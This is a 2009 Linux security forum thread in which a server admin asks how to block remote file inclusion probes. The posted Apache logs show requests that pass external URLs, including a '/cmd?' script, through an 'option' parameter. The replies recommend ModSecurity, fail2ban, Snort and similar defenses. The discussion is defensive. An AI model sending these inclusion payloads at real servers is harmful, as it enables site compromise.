LinuxQuestions.org
Help answer threads with 0 replies.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices

Reply
 
Search this Thread
Old 05-29-2009, 05:05 AM   #1
Bono
LQ Newbie
 
Registered: Dec 2008
Location: Croatia
Distribution: Debian Squeeze, Redhat 5
Posts: 24

Rep: Reputation: 0
iframe attack on my host


Is there any way I could block this kind of attacks, they just add extra load to my server. I'm using CSF http://www.configserver.com/cp/csf.html so if there is some tool that can check apache logs and automatically ban ip addresses it would be nice.

Thanks

Code:
118.105.145.13 - - [29/May/2009:01:28:23 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
71.113.186.235 - - [29/May/2009:01:28:55 +0200] "GET /index.php?option=http://babycaleb.fortunecity.co.uk/picture.htm? HTTP/1.1" 200 129 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
80.160.125.162 - - [29/May/2009:01:29:08 +0200] "GET /index.php?option=http://74.208.173.138:4443/index.html? HTTP/1.1" 200 129 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
80.160.125.162 - - [29/May/2009:01:29:11 +0200] "GET /index.php?option=http://211.245.23.155:2666/index.html? HTTP/1.1" 200 129 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
118.105.145.13 - - [29/May/2009:01:29:12 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
189.71.64.158 - - [29/May/2009:01:29:14 +0200] "GET /index.php?option=http://59.120.216.117/cmd? HTTP/1.1" 200 129 "-" "Mozilla/3.0 (compatible; Indy Library)"
74.205.212.18 - - [29/May/2009:01:29:52 +0200] "GET /index.php?option=http://211.245.23.155:2666/index.html? HTTP/1.1" 200 129 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
78.43.146.207 - - [29/May/2009:01:29:59 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
118.105.145.13 - - [29/May/2009:01:30:07 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
70.45.32.119 - - [29/May/2009:01:30:18 +0200] "GET /index.php?option=http://193.255.208.32:2082/index.html? HTTP/1.1" 200 129 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.113.186.235 - - [29/May/2009:01:30:38 +0200] "GET /index.php?option=http://babycaleb.fortunecity.co.uk/picture.htm? HTTP/1.1" 200 129 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
78.43.146.207 - - [29/May/2009:01:30:38 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
78.43.146.207 - - [29/May/2009:01:31:01 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
118.105.145.13 - - [29/May/2009:01:31:04 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
78.43.146.207 - - [29/May/2009:01:31:23 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
78.43.146.207 - - [29/May/2009:01:31:46 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
78.43.146.207 - - [29/May/2009:01:32:10 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
78.43.146.207 - - [29/May/2009:01:32:39 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
78.43.146.207 - - [29/May/2009:01:33:02 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
78.43.146.207 - - [29/May/2009:01:33:30 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
118.105.145.13 - - [29/May/2009:01:33:38 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
78.43.146.207 - - [29/May/2009:01:33:54 +0200] "GET /index.php?option=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html? HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9"
 
Old 05-29-2009, 05:29 AM   #2
repo
LQ 5k Club
 
Registered: May 2001
Location: Belgium
Distribution: Linux Mint
Posts: 8,501

Rep: Reputation: 883Reputation: 883Reputation: 883Reputation: 883Reputation: 883Reputation: 883Reputation: 883
Take a look at fail2ban or use Apache's mod_access
 
Old 08-09-2009, 06:57 PM   #3
philip_clarke
LQ Newbie
 
Registered: Aug 2009
Posts: 4

Rep: Reputation: 0
Quote:
Originally Posted by Bono View Post
Is there any way I could block this kind of attacks, they just add extra load to my server. I'm using CSF configserver , so if there is some tool that can check apache logs and automatically ban ip addresses it would be nice.

Thanks
You can try 3xLock dot com from me, (as a new member it will not allow me to post the URL) it's free and runs on Apache PHP server and has a bot blocking component. It works using mod_rewrite to block the bots with a minimal 403 response and you can set the expiry time or manually block an ip address from your web server. It doesn't use iptables but then the "problem" with that method is setting the expiry.

You could also use swatch which scans the logs for specific regular expressions and can then automatically add an iptables rule to deny access. (expiry problem still applies) Also swatch is available in rpms for some distros but it does take some time to set up which mainly has to be done through trial and error.

Philip.
 
Old 08-09-2009, 07:28 PM   #4
unixfool
Member
 
Registered: May 2005
Location: Northern VA
Distribution: Slackware, Ubuntu, FreeBSD, OpenBSD, OS X
Posts: 781
Blog Entries: 8

Rep: Reputation: 157Reputation: 157
I'm not familiar with fail2ban, but I thought that it was similar to Denyhosts (which I am familiar with). If that's the case, fail2ban won't help this type of traffic. The best tool for the job would be Snort-inline or, better yet, Modsecurity (an appilcation firewall).
 
Old 08-10-2009, 01:12 AM   #5
philip_clarke
LQ Newbie
 
Registered: Aug 2009
Posts: 4

Rep: Reputation: 0
Denying unwanted webtraffic from bots

Quote:
Originally Posted by unixfool View Post
I'm not familiar with fail2ban, but I thought that it was similar to Denyhosts (which I am familiar with). If that's the case, fail2ban won't help this type of traffic. The best tool for the job would be Snort-inline or, better yet, Modsecurity (an appilcation firewall).
Ah, I've found modsecurity to be a bit of a pain to configure with too much information and too many false positives.

I always try to take into account the person with limited hosting like those budget services (last year I made the mistake of assuming everyone for example had SSH ability or even access to their log files). So for the person with only web space then there's also http://php-ids.org/ which needs some PHP code included in a universal header page and assumes that the unwanted traffic is at least hitting the web server without creating a 404 (3xlock at https://www.3xlock.com at least doesn't require traffic to have a valid destination as the bot blocking component work on using mod-rewrite in the top level .htaccess file).

Also if the host is using cPanel and WHM there is an "okay" firewall built in but not often turned on and that is at least dynamic with the added advantage that it does expire blocked ip addresses.

The reason I found this thread was actually cross-referencing the URL's in a client's blocked logs with google and some of the traffic above is similar. Some appears to be a denial of service against a blog that publishes the IRC channels of bots, except it hosts at Google's blogspot so it's a poor ineffective attempt, unless the purpose is to get the blog banned by filling the net with repeated "click my ad" requests associated with the URL in an attempt at google bombing.

Philip.
 
Old 08-10-2009, 02:05 AM   #6
unixfool
Member
 
Registered: May 2005
Location: Northern VA
Distribution: Slackware, Ubuntu, FreeBSD, OpenBSD, OS X
Posts: 781
Blog Entries: 8

Rep: Reputation: 157Reputation: 157
These types of attacks have become the 'norm'...similar to CodeRed and Nimda. If you're not using PHP, you're fine. If you are, you'd definitely need to read up on the PHP sticky thread at the top of the forum. Most of these types of attacks come from sites that have been compromised. Once compromised, they attempt to find other susceptible machines to compromise. There are limited ways to block them, IMO. One of the surest ways is Modsecurity. Modsecurity is essentially an IDS/IPS. Such software requires tuning to meet your webserver's needs. It isn't a task for the meek. Before even delving into that, the requirement is that you're going to need full admin privileges to install and administrate the software, which you may or may not have, depending on the hosting solution you've purchased. This isn't something you're going to be able to do using GUIs such as CPanel.

Unless someone comes up with a tool similar to fail2ban for webservers, its going to be hard to block such activity. A few years ago, I was hosting a webserver with full admin privileges with no firewall, but a firewall is no help with webserver traffic, since most webservers require all port 80 traffic to be open and unobstructed. I had to leave port 80 open, which is why I wasn't running PHP (that was my way of mitigating the risks of using PHP...I couldn't control the unwanted traffic, so I disabled PHP). Now, I have some PHP-based apps running (even then, I limit who hits those pages), along with Modsecurity. I've yet to see it allow such attacks/scanning. If you pay attention to your logs, update your rules, and tune/disable rules that tend to block legit traffic, it's not so bad of a tool...its no different from Snort, but some people even have issues wrapping their heads around the workload required to have a smoothly-running Snort setup.

One thing I like about running both Modsecurity and Snort is that if Modsecurity blocks traffic, it'll generate 404 statuses, for instance, which will trigger a Snort alert for each of those. I always check my Snort alerts (not so with Modsecurity alerts). When Modsecurity alerts, I almost always get a Snort alert. It may seem redundant, until you have the chance to correlate both alerts. It is then that what seems to usually be information overload turns into a goldmine of information, especially if you've configured Snort to gather as much packets as possible when an alert is triggered. And, it is cool indeed to actually see something actively blocking bad traffic (and you not having to manually block such traffic 3 days later because you're worried).

YMMV!

Last edited by unixfool; 08-10-2009 at 02:10 AM.
 
Old 08-11-2009, 01:44 AM   #7
philip_clarke
LQ Newbie
 
Registered: Aug 2009
Posts: 4

Rep: Reputation: 0
Quote:
Originally Posted by unixfool View Post
These types of attacks have become the 'norm'...similar to CodeRed and Nimda.
There's the grandfather of them all Santy, the fastest moving worldwide worm that targetted phpBB, and Slacker, Lupper, can't remember the other. If in doubt use static html. thought my software does work well.

Quote:
Originally Posted by unixfool View Post
Unless someone comes up with a tool similar to fail2ban for webservers,
It is be very easy to do this for web servers by using some old techniques. a) set up .htaccess to use mod_rewrite with the set of rules pointing to a "banning page". That page inserts the ip address into a database, have a daemon running in the background as root (as in separate the nobody and root users) that iptables the ip addresses in the database and expries them after XX minutes. This does require full admin privileges because of the root daemon (as it needs iptables privs), but I could probably knock it up over the next couple of days since I have the rulesets based on 3xLock.

The reason 3xLock doesn't do this is because it's for general people to ban access to their webservers from bots, hackers, script kiddies, when they are running as unprivileged users.

If you want to be my test monkey I'll gladly knock up some code. If you get any false positives you'd just need to comment out the .htaccess code.

Philip.
 
Old 08-11-2009, 01:46 AM   #8
abefroman
Senior Member
 
Registered: Feb 2004
Location: Chicago
Distribution: CentOS
Posts: 1,257

Rep: Reputation: 53
Quote:
Originally Posted by philip_clarke View Post
Ah, I've found modsecurity to be a bit of a pain to configure with too much information and too many false positives.
I found the exact opposite with modsecurity and swear by it. I have tweaked my large ruleset so there are no false positives.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
force iframe content to remain in iframe? frieza Programming 1 09-17-2008 06:29 AM
CentOS Apache Server - identifying (virtual host) target of spam attack Lord Matt Linux - Server 3 04-07-2008 02:17 AM
Problem with iframe in Mozilla and Firefox ! Balakrishnan84 Programming 4 08-05-2007 11:22 PM
iframe woes ScottReed Programming 0 07-26-2007 11:04 AM
javascript - submit an iframe form AM1SHFURN1TURE Programming 1 09-23-2006 05:51 PM


All times are GMT -5. The time now is 07:51 PM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration